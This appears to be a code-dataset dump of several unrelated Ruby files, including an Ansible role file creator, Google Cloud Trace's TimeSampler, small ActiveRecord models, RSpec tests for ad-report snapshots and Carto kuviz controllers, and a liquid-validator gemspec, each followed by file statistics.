Hyperstack::Internal::Component::Tags::HTML_TAGS.include?(klass))
render(klass, *args, &block)
else
hyperstack_component_original_meth_missing(name, *args, &block)
end
end
end
end
end
end
end
| 31.454545 | 82 | 0.583815 |
03d83495a02f30d6a9fcc40c8b09d566e5696313 | 1,301 | # Copyright [2020] [University of Aizu]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Ansible
module Roles
module File
class Create < Base
def initialize(args)
super(
resource_path: "#{ANSIBLE_ROLES_TEMPLATE_PATH}/file/create",
role_path: "#{args[:role_dir]}/#{args[:data]['name']}.file.create",
dir: "#{args[:data]['name']}.file.create",
data: args[:data]['file_create']
)
end
def create
super
create_files
end
private
def create_files
FileUtils.mkdir_p("#{@role_path}/files")
::File.open("#{@role_path}/files/file", 'w+') do |f|
f.puts(@data['content'])
end
end
end
end
end
end
| 28.911111 | 79 | 0.618755 |
032a2ad6b727a4656eec5b195b1692936cf9abb7 | 3,718 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Cloud
module Trace
##
# A sampler determines whether a given request's latency trace should
# actually be reported. It is usually not necessary to trace every
# request, especially for an application serving heavy traffic. You may
# use a sampler to decide, for a given request, whether to report its
# trace. A sampler is simply a Proc that takes the Rack environment as an
# argument and returns a boolean indicating whether or not to sample the
# current request. Alternately, it could be an object that duck-types the
# Proc interface by implementing the `call` method.
#
# TimeSampler is the default sampler. It bases its sampling decision on
# two considerations:
#
# 1. It allows you to blacklist certain URI paths that should never be
# traced. For example, the Google App Engine health check request
# path `/_ah/health` is blacklisted by default.
# 2. It spaces samples out by delaying a minimum time between each
# sample. This enforces a maximum QPS for this Ruby process.
#
class TimeSampler
##
# Default list of paths for which to disable traces. Currently includes
# App Engine Flex health checks.
DEFAULT_PATH_BLACKLIST = ["/_ah/health"].freeze
##
# Create a TimeSampler for the given QPS.
#
# @param [Number] qps Samples per second. Default is 0.1.
# @param [Array{String,Regex}] path_blacklist An array of paths or
# path patterns indicating URIs that should never be traced.
# Default is DEFAULT_PATH_BLACKLIST.
#
def initialize qps: 0.1, path_blacklist: DEFAULT_PATH_BLACKLIST
@delay_secs = 1.0 / qps
@last_time = ::Time.now.to_f - @delay_secs
@path_blacklist = path_blacklist
end
@default = new
##
# Get the default global TimeSampler.
#
# @return [TimeSampler]
#
def self.default
@default
end
##
# Implements the sampler contract. Checks to see whether a sample
# should be taken at this time.
#
# @param [Hash] env Rack environment.
# @return [Boolean] Whether to sample at this time.
#
def call env
return false if path_blacklisted? env
time = ::Time.now.to_f
delays = (time - @last_time) / @delay_secs
if delays >= 2.0
@last_time = time - @delay_secs
true
elsif delays >= 1.0
@last_time += @delay_secs
true
else
false
end
end
##
# Determines if the URI path in the given Rack environment is
# blacklisted in this sampler.
#
# @private
#
def path_blacklisted? env
path = "#{env['SCRIPT_NAME']}#{env['PATH_INFO']}"
path = "/#{path}" unless path.start_with? "/"
@path_blacklist.find { |p| p === path }
end
end
end
end
end
| 35.409524 | 79 | 0.615654 |
21fdbf96430ec82c3bc44d24621d8cb08a05b514 | 186 | class Favourite < ActiveRecord::Base
# This is Sinatra! Remember to create a migration!
belongs_to :user
belongs_to :product
validates :user_id, uniqueness: {scope: :product_id}
end
| 26.571429 | 53 | 0.774194 |
bf14887e7146eee2fb24c7ca5fc43e6ab3a158dd | 785 | require_relative '../automated_init'
context "Publish" do
context "Expected Version" do
publish = Publish.new
entity = Controls::Entity.example
version = Controls::Version.example
publish.store.add(entity.id, entity, version)
recorded_event = Controls::Messages::Recorded.example
publish.clock.now = Clock.parse(recorded_event.time)
publish.(recorded_event)
writer = publish.write
published = writer.one_message do |event|
event.instance_of?(Messages::Events::Published)
end
refute(published.nil?)
test "Is not set" do
is_entity_version = writer.written?(published) do |_, expected_version|
expected_version.nil? && expected_version != version
end
assert(is_entity_version)
end
end
end
| 22.428571 | 77 | 0.698089 |
b92944ebfdcfa6a15ccc98edf041dfad3777d1e6 | 447 | class Micropost < ApplicationRecord
belongs_to :user
default_scope -> {order(created_at: :desc)}
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content, presence: true, length: { maximum: 140 }
validate :picture_size
private
#アップロードされた画像のサイズをバリデーションする
def picture_size
if picture.size > 5.megabytes
errors.add(:picture, "should be less than 5MB")
end
end
end
| 24.833333 | 62 | 0.713647 |
619a92e78e4ad7239c8fd7d844e0c53e8d765894 | 2,376 | require "spec_helper"
RSpec.describe Blurb::Snapshot do
include_context "shared setup"
describe "#create" do
context "given a keywords recordType" do
it "returns a keywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
status = Blurb::Snapshot.status(payload_response["snapshotId"])
if status && status["location"]
report = Blurb::Snapshot.download(status["location"])
expect(report).not_to be nil
end
end
end
context "given a campaign recordType" do
it "returns a campaign snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::CAMPAIGNS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a ad_group recordType" do
it "returns a ad_group snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::AD_GROUPS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a product_ad recordType" do
it "returns a product_ad snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::PRODUCT_ADS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a negativeKeywords recordType" do
it "returns a negativeKeywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::NEGATIVE_KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
context "given a campaignNegativeKeywords recordType" do
it "returns a campaignNegativeKeywords snapshot" do
payload_response = Blurb::Snapshot.create({
"recordType" => Blurb::Snapshot::CAMPAIGN_NEGATIVE_KEYWORDS,
"stateFilter" => "enabled,paused,archived"
})
expect(payload_response).not_to be nil
end
end
end
end
| 28.97561 | 71 | 0.633838 |
284e4fa9adcb3579453bfa5e512217b7c85deb29 | 213 | class RemovePhotoFieldsFromBeer < ActiveRecord::Migration
def change
remove_column :beers, :photo_file_name
remove_column :beers, :photo_content_type
remove_column :beers, :photo_file_size
end
end
| 26.625 | 57 | 0.788732 |
391cb48576df2d4018fa5deacf55b158feb609fd | 2,547 |
require_relative '../../../spec_helper'
require_relative '../../../factories/users_helper'
describe Carto::Kuviz::VisualizationsController do
include Warden::Test::Helpers
after(:all) do
FileUtils.rmtree(Carto::Conf.new.public_uploads_path + '/kuviz_assets')
end
describe '#show' do
before(:each) do
@kuviz = FactoryGirl.create(:kuviz_visualization)
@kuviz.save
@asset = Carto::Asset.for_visualization(visualization: @kuviz,
resource: StringIO.new('<html><body>test</body></html>'))
@asset.save
login(@kuviz.user)
end
it 'shows public kuviz' do
get kuviz_show_url(id: @kuviz.id)
response.status.should eq 200
response.body.scan(/test/).present?.should == true
response.headers.include?('X-Frame-Options').should == false
end
it 'shows 404 on non-existent kuviz' do
get kuviz_show_url(id: 'fake-uuid')
response.status.should eq 404
end
it 'shows password protected kuviz' do
@kuviz.privacy = Carto::Visualization::PRIVACY_PROTECTED
@kuviz.password = 'test'
@kuviz.save
get kuviz_show_url(id: @kuviz.id)
response.status.should eq 200
response.body.scan(/Insert your password/).present?.should == true
end
end
describe '#show_protected' do
before(:each) do
@kuviz = FactoryGirl.create(:kuviz_protected_visualization)
@kuviz.save
@asset = Carto::Asset.for_visualization(visualization: @kuviz,
resource: StringIO.new('<html><body>test</body></html>'))
@asset.save
login(@kuviz.user)
end
it 'shows password error message is the password is incorrect' do
post kuviz_password_protected_url(id: @kuviz.id), password: 'wrong_password'
response.status.should eq 200
response.body.scan(/Invalid password/).present?.should == true
end
it 'shows 404 if the kuviz is not password protected' do
@kuviz.password = ''
@kuviz.privacy = Carto::Visualization::PRIVACY_PUBLIC
@kuviz.save
post kuviz_password_protected_url(id: @kuviz.id), password: 'wrong_password'
response.status.should eq 404
end
it 'shows password protected kuviz' do
post kuviz_password_protected_url(id: @kuviz.id), password: 'test'
response.status.should eq 200
response.body.scan(/<body>test<\/body>/).present?.should == true
response.headers.include?('X-Frame-Options').should == false
end
end
end
| 30.686747 | 103 | 0.65214 |
e9eef1ed17d5b31ad2266d4fbbc477fbfcc009a2 | 1,299 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'liquid-validator/version'
Gem::Specification.new do |spec|
spec.name = "liquid-validator"
spec.version = LiquidValidator::VERSION
spec.authors = ["Jeremy W. Rowe"]
spec.email = ["[email protected]"]
spec.description = %q{Liquid template validator}
spec.summary = %q{Validates template strings that are consumed when creating a liquid template. It is simple, that is the point.}
spec.homepage = "https://github.com/jeremywrowe/liquid-validator"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test)/})
spec.require_paths = ["lib"]
spec.add_dependency('liquid', '>= 2.4.0')
spec.add_development_dependency "bundler", "~> 1.16.0"
spec.add_development_dependency "rake"
spec.add_development_dependency "minitest"
spec.add_development_dependency "pry"
spec.add_development_dependency "rubocop"
spec.add_development_dependency "appraisal"
end
| 39.363636 | 137 | 0.683603 |
26c3e59dee1988ceaeaccc748bb5e25a738857db | 200 | class GroupSerializer < ActiveModel::Serializer
attributes(
:id,
:name,
:organization_id,
:group_type,
:archived,
:test,
:dummy,
:created_at,
:updated_at
)
end
| 14.285714 | 47 | 0.61 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.